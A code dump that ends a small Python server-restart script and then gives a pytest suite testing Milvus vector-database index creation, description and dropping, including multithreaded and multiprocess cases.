# Handle server loop to restart when failure
def start_server_manager(isThreaded):
"""
Args:
isThreaded:
Returns:
"""
try:
while True:
if isThreaded:
# this will perform SG authentication, to avoid all threads trying to do it in parallel
# resolver.authenticate()
launch_threaded_server()
else:
launch_simple_server()
except turret_server_exception as e:
print("Server manager has caught exception: [%s]" % str(e))
def main():
p = OptionParser(usage="%prog arg1 [options]")
p.add_option("-t", "--threaded", dest="threaded", default=False, action="store_true")
(opts, args) = p.parse_args(sys.argv[1:])
global LOGGER
LOGGER = get_logger()
start_server_manager(opts.threaded)
if __name__ == "__main__":
main()
|
test_index.py
|
"""
For testing index operations, including `create_index`, `describe_index` and `drop_index` interfaces
"""
import logging
import pytest
import time
import pdb
import threading
from multiprocessing import Pool, Process
import numpy
import sklearn.preprocessing
from milvus import IndexType, MetricType
from utils import *
nb = 6000
dim = 128
index_file_size = 10
vectors = gen_vectors(nb, dim)
vectors = sklearn.preprocessing.normalize(vectors, axis=1, norm='l2')
vectors = vectors.tolist()
BUILD_TIMEOUT = 300
nprobe = 1
tag = "1970-01-01"
NLIST = 4046
INVALID_NLIST = 100000000
class TestIndexBase:
@pytest.fixture(
scope="function",
params=gen_index()
)
def get_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in CPU mode")
if str(connect._cmd("mode")[1]) == "GPU":
if request.param["index_type"] == IndexType.IVF_PQ:
pytest.skip("ivfpq not support in GPU mode")
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in CPU mode")
if str(connect._cmd("mode")[1]) == "GPU":
if request.param["index_type"] == IndexType.IVF_PQ:
pytest.skip("ivfpq not support in GPU mode")
return request.param
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index(self, connect, collection, get_simple_index):
'''
target: test create index interface
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
status, ids = connect.add_vectors(collection, vectors)
status = connect.create_index(collection, index_type, index_param)
assert status.OK()
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_no_vectors(self, connect, collection, get_simple_index):
'''
target: test create index interface
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
status = connect.create_index(collection, index_type, index_param)
assert status.OK()
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition(self, connect, collection, get_simple_index):
'''
target: test create index interface
method: create collection, create partition, and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
status = connect.create_partition(collection, tag)
status, ids = connect.add_vectors(collection, vectors, partition_tag=tag)
status = connect.create_index(collection, index_type, index_param)
assert status.OK()
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition_flush(self, connect, collection, get_simple_index):
'''
target: test create index interface
method: create collection, create partition, and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
status = connect.create_partition(collection, tag)
status, ids = connect.add_vectors(collection, vectors, partition_tag=tag)
connect.flush()
status = connect.create_index(collection, index_type, index_param)
assert status.OK()
# @pytest.mark.level(2)
# def test_create_index_without_connect(self, dis_connect, collection):
# '''
# target: test create index without connection
# method: create collection and add vectors in it, check if added successfully
# expected: raise exception
# '''
# nlist = NLIST
# index_type = IndexType.IVF_SQ8
# index_param = {"nlist": nlist}
# with pytest.raises(Exception) as e:
# status = dis_connect.create_index(collection, index_type, index_param)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_search_with_query_vectors(self, connect, collection, get_simple_index):
'''
target: test create index interface, search with more query vectors
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
status, ids = connect.add_vectors(collection, vectors)
status = connect.create_index(collection, index_type, index_param)
logging.getLogger().info(connect.describe_index(collection))
query_vecs = [vectors[0], vectors[1], vectors[2]]
top_k = 5
search_param = get_search_param(index_type)
status, result = connect.search_vectors(collection, top_k, query_vecs, params=search_param)
assert status.OK()
assert len(result) == len(query_vecs)
logging.getLogger().info(result)
@pytest.mark.timeout(BUILD_TIMEOUT)
@pytest.mark.level(2)
def test_create_index_multithread(self, connect, collection, args):
'''
target: test create index interface with multiprocess
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
status, ids = connect.add_vectors(collection, vectors)
def build(connect):
status = connect.create_index(collection, IndexType.IVFLAT, {"nlist": NLIST})
assert status.OK()
threads_num = 8
threads = []
for i in range(threads_num):
m = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"])
t = threading.Thread(target=build, args=(m,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
query_vec = [vectors[0]]
top_k = 1
search_param = {"nprobe": nprobe}
status, result = connect.search_vectors(collection, top_k, query_vec, params=search_param)
assert len(result) == 1
assert len(result[0]) == top_k
assert result[0][0].distance == 0.0
@pytest.mark.level(2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_multithread_multicollection(self, connect, args):
'''
target: test create index interface with multiprocess
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
threads_num = 8
loop_num = 8
threads = []
collection = []
j = 0
while j < (threads_num*loop_num):
collection_name = gen_unique_str("test_create_index_multiprocessing")
collection.append(collection_name)
param = {'collection_name': collection_name,
'dimension': dim,
'index_type': IndexType.FLAT,
'store_raw_vector': False}
connect.create_collection(param)
j = j + 1
def create_index():
i = 0
while i < loop_num:
# assert connect.has_collection(collection[ids*process_num+i])
status, ids = connect.add_vectors(collection[ids*threads_num+i], vectors)
status = connect.create_index(collection[ids*threads_num+i], IndexType.IVFLAT, {"nlist": NLIST})
assert status.OK()
query_vec = [vectors[0]]
top_k = 1
search_param = {"nprobe": nprobe}
status, result = connect.search_vectors(collection[ids*threads_num+i], top_k, query_vec, params=search_param)
assert len(result) == 1
assert len(result[0]) == top_k
assert result[0][0].distance == 0.0
i = i + 1
for i in range(threads_num):
m = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"])
ids = i
t = threading.Thread(target=create_index, args=(m, ids))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
@pytest.mark.timeout(BUILD_TIMEOUT)
@pytest.mark.level(2)
def test_create_index_a_multithreads(self, connect, collection, args):
status, ids = connect.add_vectors(collection, vectors)
def build(connect):
status = connect.create_index(collection, IndexType.IVFLAT, {"nlist": NLIST})
assert status.OK()
def count(connect):
status, count = connect.count_collection(collection)
assert status.OK()
assert count == nb
threads_num = 8
threads = []
uri = "tcp://%s:%s" % (args["ip"], args["port"])
for i in range(threads_num):
m = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"])
if(i % 2 == 0):
p = threading.Thread(target=build, args=(m,))
else:
p = threading.Thread(target=count, args=(m,))
threads.append(p)
p.start()
time.sleep(0.2)
for p in threads:
p.join()
# TODO: enable
@pytest.mark.timeout(BUILD_TIMEOUT)
@pytest.mark.level(2)
def _test_create_index_multiprocessing(self, connect, collection, args):
'''
target: test create index interface with multiprocess
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
status, ids = connect.add_vectors(collection, vectors)
def build(connect):
status = connect.create_index(collection, IndexType.IVFLAT, {"nlist": NLIST})
assert status.OK()
process_num = 8
processes = []
for i in range(process_num):
m = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"])
p = Process(target=build, args=(m,))
processes.append(p)
p.start()
time.sleep(0.2)
for p in processes:
p.join()
query_vec = [vectors[0]]
top_k = 1
search_param = {"nprobe": nprobe}
status, result = connect.search_vectors(collection, top_k, query_vec, params=search_param)
assert len(result) == 1
assert len(result[0]) == top_k
assert result[0][0].distance == 0.0
# TODO: enable
@pytest.mark.timeout(BUILD_TIMEOUT)
def _test_create_index_multiprocessing_multicollection(self, connect, args):
'''
target: test create index interface with multiprocess
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
process_num = 8
loop_num = 8
processes = []
collection = []
j = 0
while j < (process_num*loop_num):
collection_name = gen_unique_str("test_create_index_multiprocessing")
collection.append(collection_name)
param = {'collection_name': collection_name,
'dimension': dim,
'index_type': IndexType.FLAT,
'store_raw_vector': False}
connect.create_collection(param)
j = j + 1
def create_index():
i = 0
while i < loop_num:
# assert connect.has_collection(collection[ids*process_num+i])
status, ids = connect.add_vectors(collection[ids*process_num+i], vectors)
status = connect.create_index(collection[ids*process_num+i], IndexType.IVFLAT, {"nlist": NLIST})
assert status.OK()
query_vec = [vectors[0]]
top_k = 1
search_param = {"nprobe": nprobe}
status, result = connect.search_vectors(collection[ids*process_num+i], top_k, query_vec, params=search_param)
assert len(result) == 1
assert len(result[0]) == top_k
assert result[0][0].distance == 0.0
i = i + 1
for i in range(process_num):
m = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"])
ids = i
p = Process(target=create_index, args=(m,ids))
processes.append(p)
p.start()
time.sleep(0.2)
for p in processes:
p.join()
def test_create_index_collection_not_existed(self, connect):
'''
target: test create index interface when collection name not existed
method: create collection and add vectors in it, create index
, make sure the collection name not in index
expected: return code not equals to 0, create index failed
'''
collection_name = gen_unique_str(self.__class__.__name__)
nlist = NLIST
index_type = IndexType.IVF_SQ8
index_param = {"nlist": nlist}
status = connect.create_index(collection_name, index_type, index_param)
assert not status.OK()
def test_create_index_collection_None(self, connect):
'''
target: test create index interface when collection name is None
method: create collection and add vectors in it, create index with an collection_name: None
expected: return code not equals to 0, create index failed
'''
collection_name = None
nlist = NLIST
index_type = IndexType.IVF_SQ8
index_param = {"nlist": nlist}
with pytest.raises(Exception) as e:
status = connect.create_index(collection_name, index_type, index_param)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_no_vectors_then_add_vectors(self, connect, collection, get_simple_index):
'''
target: test create index interface when there is no vectors in collection, and does not affect the subsequent process
method: create collection and add no vectors in it, and then create index, add vectors in it
expected: return code equals to 0
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status = connect.create_index(collection, index_type, index_param)
status, ids = connect.add_vectors(collection, vectors)
assert status.OK()
@pytest.mark.level(2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_same_index_repeatedly(self, connect, collection, get_simple_index):
'''
target: check if index can be created repeatedly, with the same create_index params
method: create index after index have been built
expected: return code success, and search ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status = connect.create_index(collection, index_type, index_param)
status = connect.create_index(collection, index_type, index_param)
assert status.OK()
@pytest.mark.level(2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_different_index_repeatedly(self, connect, collection):
'''
target: check if index can be created repeatedly, with the different create_index params
method: create another index with different index_params after index have been built
expected: return code 0, and describe index result equals with the second index params
'''
nlist = NLIST
status, ids = connect.add_vectors(collection, vectors)
index_type_1 = IndexType.IVF_SQ8
index_type_2 = IndexType.IVFLAT
indexs = [{"index_type": index_type_1, "index_param": {"nlist": nlist}}, {"index_type": index_type_2, "index_param": {"nlist": nlist}}]
logging.getLogger().info(indexs)
for index in indexs:
status = connect.create_index(collection, index["index_type"], index["index_param"])
assert status.OK()
status, result = connect.describe_index(collection)
assert result._params["nlist"] == nlist
assert result._collection_name == collection
assert result._index_type == index_type_2
"""
******************************************************************
The following cases are used to test `describe_index` function
******************************************************************
"""
def test_describe_index(self, connect, collection, get_index):
'''
target: test describe index interface
method: create collection and add vectors in it, create index, call describe index
expected: return code 0, and index instructure
'''
index_param = get_index["index_param"]
index_type = get_index["index_type"]
logging.getLogger().info(get_index)
# status, ids = connect.add_vectors(collection, vectors)
status = connect.create_index(collection, index_type, index_param)
if status.OK():
status, result = connect.describe_index(collection)
logging.getLogger().info(result)
assert result._params == index_param
assert result._collection_name == collection
assert result._index_type == index_type
def test_describe_and_drop_index_multi_collections(self, connect, get_simple_index):
'''
target: test create, describe and drop index interface with multiple collections of L2
method: create collections and add vectors in it, create index, call describe index
expected: return code 0, and index instructure
'''
nq = 100
vectors = gen_vectors(nq, dim)
collection_list = []
for i in range(10):
collection_name = gen_unique_str()
collection_list.append(collection_name)
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
connect.create_collection(param)
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
status, ids = connect.add_vectors(collection_name=collection_name, records=vectors)
status = connect.create_index(collection_name, index_type, index_param)
assert status.OK()
for i in range(10):
status, result = connect.describe_index(collection_list[i])
logging.getLogger().info(result)
assert result._params == index_param
assert result._collection_name == collection_list[i]
assert result._index_type == index_type
for i in range(10):
status = connect.drop_index(collection_list[i])
assert status.OK()
status, result = connect.describe_index(collection_list[i])
logging.getLogger().info(result)
assert result._collection_name == collection_list[i]
assert result._index_type == IndexType.FLAT
# @pytest.mark.level(2)
# def test_describe_index_without_connect(self, dis_connect, collection):
# '''
# target: test describe index without connection
# method: describe index, and check if describe successfully
# expected: raise exception
# '''
# with pytest.raises(Exception) as e:
# status = dis_connect.describe_index(collection)
def test_describe_index_collection_not_existed(self, connect):
'''
target: test describe index interface when collection name not existed
method: create collection and add vectors in it, create index
, make sure the collection name not in index
expected: return code not equals to 0, describe index failed
'''
collection_name = gen_unique_str(self.__class__.__name__)
status, result = connect.describe_index(collection_name)
assert not status.OK()
def test_describe_index_collection_None(self, connect):
'''
target: test describe index interface when collection name is None
method: create collection and add vectors in it, create index with an collection_name: None
expected: return code not equals to 0, describe index failed
'''
collection_name = None
with pytest.raises(Exception) as e:
status = connect.describe_index(collection_name)
def test_describe_index_not_create(self, connect, collection):
'''
target: test describe index interface when index not created
method: create collection and add vectors in it, create index
, make sure the collection name not in index
expected: return code not equals to 0, describe index failed
'''
status, ids = connect.add_vectors(collection, vectors)
status, result = connect.describe_index(collection)
logging.getLogger().info(result)
assert status.OK()
# assert result._params["nlist"] == index_params["nlist"]
# assert result._collection_name == collection
# assert result._index_type == index_params["index_type"]
"""
******************************************************************
The following cases are used to test `drop_index` function
******************************************************************
"""
def test_drop_index(self, connect, collection, get_simple_index):
'''
target: test drop index interface
method: create collection and add vectors in it, create index, call drop index
expected: return code 0, and default index param
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
# status, ids = connect.add_vectors(collection, vectors)
status = connect.create_index(collection, index_type, index_param)
assert status.OK()
status, result = connect.describe_index(collection)
logging.getLogger().info(result)
status = connect.drop_index(collection)
assert status.OK()
status, result = connect.describe_index(collection)
logging.getLogger().info(result)
assert result._collection_name == collection
assert result._index_type == IndexType.FLAT
@pytest.mark.level(2)
def test_drop_index_repeatly(self, connect, collection, get_simple_index):
'''
target: test drop index repeatly
method: create index, call drop index, and drop again
expected: return code 0
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
# status, ids = connect.add_vectors(collection, vectors)
status = connect.create_index(collection, index_type, index_param)
assert status.OK()
status, result = connect.describe_index(collection)
logging.getLogger().info(result)
status = connect.drop_index(collection)
assert status.OK()
status = connect.drop_index(collection)
assert status.OK()
status, result = connect.describe_index(collection)
logging.getLogger().info(result)
assert result._collection_name == collection
assert result._index_type == IndexType.FLAT
# @pytest.mark.level(2)
# def test_drop_index_without_connect(self, dis_connect, collection):
# '''
# target: test drop index without connection
# method: drop index, and check if drop successfully
# expected: raise exception
# '''
# with pytest.raises(Exception) as e:
# status = dis_connect.drop_index(collection)
def test_drop_index_collection_not_existed(self, connect):
'''
target: test drop index interface when collection name not existed
method: create collection and add vectors in it, create index
, make sure the collection name not in index, and then drop it
expected: return code not equals to 0, drop index failed
'''
collection_name = gen_unique_str(self.__class__.__name__)
status = connect.drop_index(collection_name)
assert not status.OK()
def test_drop_index_collection_None(self, connect):
'''
target: test drop index interface when collection name is None
method: create collection and add vectors in it, create index with an collection_name: None
expected: return code not equals to 0, drop index failed
'''
collection_name = None
with pytest.raises(Exception) as e:
status = connect.drop_index(collection_name)
def test_drop_index_collection_not_create(self, connect, collection):
'''
target: test drop index interface when index not created
method: create collection and add vectors in it, create index
expected: return code not equals to 0, drop index failed
'''
status, ids = connect.add_vectors(collection, vectors)
status, result = connect.describe_index(collection)
logging.getLogger().info(result)
# no create index
status = connect.drop_index(collection)
logging.getLogger().info(status)
assert status.OK()
@pytest.mark.level(2)
def test_create_drop_index_repeatly(self, connect, collection, get_simple_index):
'''
target: test create / drop index repeatly, use the same index params
method: create index, drop index, four times
expected: return code 0
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
# status, ids = connect.add_vectors(collection, vectors)
for i in range(2):
status = connect.create_index(collection, index_type, index_param)
assert status.OK()
status, result = connect.describe_index(collection)
logging.getLogger().info(result)
status = connect.drop_index(collection)
assert status.OK()
status, result = connect.describe_index(collection)
logging.getLogger().info(result)
assert result._collection_name == collection
assert result._index_type == IndexType.FLAT
def test_create_drop_index_repeatly_different_index_params(self, connect, collection):
'''
target: test create / drop index repeatly, use the different index params
method: create index, drop index, four times, each tme use different index_params to create index
expected: return code 0
'''
nlist = NLIST
indexs = [{"index_type": IndexType.IVFLAT, "index_param": {"nlist": nlist}}, {"index_type": IndexType.IVF_SQ8, "index_param": {"nlist": nlist}}]
# status, ids = connect.add_vectors(collection, vectors)
for i in range(2):
status = connect.create_index(collection, indexs[i]["index_type"], indexs[i]["index_param"])
assert status.OK()
status, result = connect.describe_index(collection)
logging.getLogger().info(result)
status = connect.drop_index(collection)
assert status.OK()
status, result = connect.describe_index(collection)
logging.getLogger().info(result)
assert result._collection_name == collection
assert result._index_type == IndexType.FLAT
class TestIndexIP:
@pytest.fixture(
scope="function",
params=gen_index()
)
def get_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in CPU mode")
if str(connect._cmd("mode")[1]) == "GPU":
if request.param["index_type"] == IndexType.IVF_PQ:
pytest.skip("ivfpq not support in GPU mode")
if request.param["index_type"] == IndexType.RNSG:
pytest.skip("rnsg not support in ip")
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in CPU mode")
if str(connect._cmd("mode")[1]) == "GPU":
if request.param["index_type"] == IndexType.IVF_PQ:
pytest.skip("ivfpq not support in GPU mode")
if request.param["index_type"] == IndexType.RNSG:
pytest.skip("rnsg not support in ip")
return request.param
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.mark.level(2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index(self, connect, ip_collection, get_simple_index):
'''
target: test create index interface
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
status, ids = connect.add_vectors(ip_collection, vectors)
status = connect.create_index(ip_collection, index_type, index_param)
assert status.OK()
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_collection(self, connect, ip_collection, get_simple_index):
'''
target: test create index interface
method: create collection, create partition, and add vectors in it, create index on collection
expected: return code equals to 0, and search success
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
status = connect.create_partition(ip_collection, tag)
status, ids = connect.add_vectors(ip_collection, vectors, partition_tag=tag)
status = connect.create_index(ip_collection, index_type, index_param)
assert status.OK()
# @pytest.mark.level(2)
# def test_create_index_without_connect(self, dis_connect, ip_collection):
# '''
# target: test create index without connection
# method: create collection and add vectors in it, check if added successfully
# expected: raise exception
# '''
# nlist = NLIST
# index_type = IndexType.IVF_SQ8
# index_param = {"nlist": nlist}
# with pytest.raises(Exception) as e:
# status = dis_connect.create_index(ip_collection, index_type, index_param)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_search_with_query_vectors(self, connect, ip_collection, get_simple_index):
'''
target: test create index interface, search with more query vectors
method: create collection and add vectors in it, create index, with no manual flush
expected: return code equals to 0, and search success
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
status, ids = connect.add_vectors(ip_collection, vectors)
status = connect.create_index(ip_collection, index_type, index_param)
logging.getLogger().info(connect.describe_index(ip_collection))
query_vecs = [vectors[0], vectors[1], vectors[2]]
top_k = 5
search_param = get_search_param(index_type)
status, result = connect.search_vectors(ip_collection, top_k, query_vecs, params=search_param)
logging.getLogger().info(result)
assert status.OK()
assert len(result) == len(query_vecs)
# TODO: enable
@pytest.mark.timeout(BUILD_TIMEOUT)
@pytest.mark.level(2)
def _test_create_index_multiprocessing(self, connect, ip_collection, args):
'''
target: test create index interface with multiprocess
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
status, ids = connect.add_vectors(ip_collection, vectors)
def build(connect):
status = connect.create_index(ip_collection, IndexType.IVFLAT, {"nlist": NLIST})
assert status.OK()
process_num = 8
processes = []
for i in range(process_num):
m = get_milvus(args["ip"], args["port"], handler=args["handler"])
p = Process(target=build, args=(m,))
processes.append(p)
p.start()
time.sleep(0.2)
for p in processes:
p.join()
query_vec = [vectors[0]]
top_k = 1
search_param = {"nprobe": nprobe}
status, result = connect.search_vectors(ip_collection, top_k, query_vec, params=search_param)
assert len(result) == 1
assert len(result[0]) == top_k
assert result[0][0].distance == 0.0
# TODO: enable
@pytest.mark.timeout(BUILD_TIMEOUT)
def _test_create_index_multiprocessing_multicollection(self, connect, args):
'''
target: test create index interface with multiprocess
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
process_num = 8
loop_num = 8
processes = []
collection = []
j = 0
while j < (process_num*loop_num):
collection_name = gen_unique_str("test_create_index_multiprocessing")
collection.append(collection_name)
param = {'collection_name': collection_name,
'dimension': dim}
connect.create_collection(param)
j = j + 1
def create_index():
i = 0
while i < loop_num:
# assert connect.has_collection(collection[ids*process_num+i])
status, ids = connect.add_vectors(collection[ids*process_num+i], vectors)
status = connect.create_index(collection[ids*process_num+i], IndexType.IVFLAT, {"nlist": NLIST})
assert status.OK()
query_vec = [vectors[0]]
top_k = 1
search_param = {"nprobe": nprobe}
status, result = connect.search_vectors(collection[ids*process_num+i], top_k, query_vec, params=search_param)
assert len(result) == 1
assert len(result[0]) == top_k
assert result[0][0].distance == 0.0
i = i + 1
for i in range(process_num):
m = get_milvus(args["ip"], args["port"], handler=args["handler"])
ids = i
p = Process(target=create_index, args=(m,ids))
processes.append(p)
p.start()
time.sleep(0.2)
for p in processes:
p.join()
def test_create_index_no_vectors(self, connect, ip_collection):
'''
target: test create index interface when there is no vectors in collection
method: create collection and add no vectors in it, and then create index
expected: return code equals to 0
'''
nlist = NLIST
index_type = IndexType.IVF_SQ8
index_param = {"nlist": nlist}
status = connect.create_index(ip_collection, index_type, index_param)
assert status.OK()
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_no_vectors_then_add_vectors(self, connect, ip_collection, get_simple_index):
'''
target: test create index interface when there is no vectors in collection, and does not affect the subsequent process
method: create collection and add no vectors in it, and then create index, add vectors in it
expected: return code equals to 0
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status = connect.create_index(ip_collection, index_type, index_param)
status, ids = connect.add_vectors(ip_collection, vectors)
assert status.OK()
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_same_index_repeatedly(self, connect, ip_collection):
'''
target: check if index can be created repeatedly, with the same create_index params
method: create index after index have been built
expected: return code success, and search ok
'''
nlist = NLIST
status, ids = connect.add_vectors(ip_collection, vectors)
index_type = IndexType.IVF_SQ8
index_param = {"nlist": nlist}
status = connect.create_index(ip_collection, index_type, index_param)
status = connect.create_index(ip_collection, index_type, index_param)
assert status.OK()
query_vec = [vectors[0]]
top_k = 1
search_param = {"nprobe": nprobe}
status, result = connect.search_vectors(ip_collection, top_k, query_vec, params=search_param)
assert len(result) == 1
assert len(result[0]) == top_k
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_different_index_repeatedly(self, connect, ip_collection):
'''
target: check if index can be created repeatedly, with the different create_index params
method: create another index with different index_params after index have been built
expected: return code 0, and describe index result equals with the second index params
'''
nlist = NLIST
status, ids = connect.add_vectors(ip_collection, vectors)
index_type_1 = IndexType.IVF_SQ8
index_type_2 = IndexType.IVFLAT
indexs = [{"index_type": index_type_1, "index_param": {"nlist": nlist}}, {"index_type": index_type_2, "index_param": {"nlist": nlist}}]
logging.getLogger().info(indexs)
for index in indexs:
status = connect.create_index(ip_collection, index["index_type"], index["index_param"])
assert status.OK()
status, result = connect.describe_index(ip_collection)
assert result._params["nlist"] == nlist
assert result._collection_name == ip_collection
assert result._index_type == index_type_2
"""
******************************************************************
The following cases are used to test `describe_index` function
******************************************************************
"""
def test_describe_index(self, connect, ip_collection, get_simple_index):
'''
target: test describe index interface
method: create collection and add vectors in it, create index, call describe index
expected: return code 0, and index instructure
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
# status, ids = connect.add_vectors(ip_collection, vectors[:5000])
status = connect.create_index(ip_collection, index_type, index_param)
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
assert result._collection_name == ip_collection
status, mode = connect._cmd("mode")
if str(mode) == "GPU" and index_type == IndexType.IVF_PQ:
assert result._index_type == IndexType.FLAT
assert result._params["nlist"] == NLIST
else:
assert result._index_type == index_type
assert result._params == index_param
def test_describe_index_partition(self, connect, ip_collection, get_simple_index):
'''
target: test describe index interface
method: create collection, create partition and add vectors in it, create index, call describe index
expected: return code 0, and index instructure
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
status = connect.create_partition(ip_collection, tag)
status, ids = connect.add_vectors(ip_collection, vectors, partition_tag=tag)
status = connect.create_index(ip_collection, index_type, index_param)
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
assert result._params == index_param
assert result._collection_name == ip_collection
assert result._index_type == index_type
def test_describe_index_partition_A(self, connect, ip_collection, get_simple_index):
'''
target: test describe index interface
method: create collection, create partitions and add vectors in it, create index on partitions, call describe index
expected: return code 0, and index instructure
'''
new_tag = "new_tag"
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
status = connect.create_partition(ip_collection, tag)
status = connect.create_partition(ip_collection, new_tag)
# status, ids = connect.add_vectors(ip_collection, vectors, partition_tag=tag)
# status, ids = connect.add_vectors(ip_collection, vectors, partition_tag=new_tag)
status = connect.create_index(ip_collection, index_type, index_param)
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
assert result._params == index_param
assert result._collection_name == ip_collection
assert result._index_type == index_type
def test_describe_and_drop_index_multi_collections(self, connect, get_simple_index):
'''
target: test create, describe and drop index interface with multiple collections of IP
method: create collections and add vectors in it, create index, call describe index
expected: return code 0, and index instructure
'''
nq = 100
vectors = gen_vectors(nq, dim)
collection_list = []
for i in range(10):
collection_name = gen_unique_str()
collection_list.append(collection_name)
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.IP}
connect.create_collection(param)
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
status, ids = connect.add_vectors(collection_name=collection_name, records=vectors)
status = connect.create_index(collection_name, index_type, index_param)
assert status.OK()
for i in range(10):
status, result = connect.describe_index(collection_list[i])
logging.getLogger().info(result)
assert result._params == index_param
assert result._collection_name == collection_list[i]
assert result._index_type == index_type
for i in range(10):
status = connect.drop_index(collection_list[i])
assert status.OK()
status, result = connect.describe_index(collection_list[i])
logging.getLogger().info(result)
assert result._collection_name == collection_list[i]
assert result._index_type == IndexType.FLAT
# @pytest.mark.level(2)
# def test_describe_index_without_connect(self, dis_connect, ip_collection):
# '''
# target: test describe index without connection
# method: describe index, and check if describe successfully
# expected: raise exception
# '''
# with pytest.raises(Exception) as e:
# status = dis_connect.describe_index(ip_collection)
def test_describe_index_not_create(self, connect, ip_collection):
'''
target: test describe index interface when index not created
method: create collection and add vectors in it, create index
, make sure the collection name not in index
expected: return code not equals to 0, describe index failed
'''
status, ids = connect.add_vectors(ip_collection, vectors)
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
assert status.OK()
# assert result._params["nlist"] == index_params["nlist"]
# assert result._collection_name == collection
# assert result._index_type == index_params["index_type"]
"""
******************************************************************
The following cases are used to test `drop_index` function
******************************************************************
"""
def test_drop_index(self, connect, ip_collection, get_simple_index):
'''
target: test drop index interface
method: create collection and add vectors in it, create index, call drop index
expected: return code 0, and default index param
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status, mode = connect._cmd("mode")
assert status.OK()
# status, ids = connect.add_vectors(ip_collection, vectors)
status = connect.create_index(ip_collection, index_type, index_param)
if str(mode) == "GPU" and (index_type == IndexType.IVF_PQ):
assert not status.OK()
else:
assert status.OK()
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
status = connect.drop_index(ip_collection)
assert status.OK()
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
assert result._collection_name == ip_collection
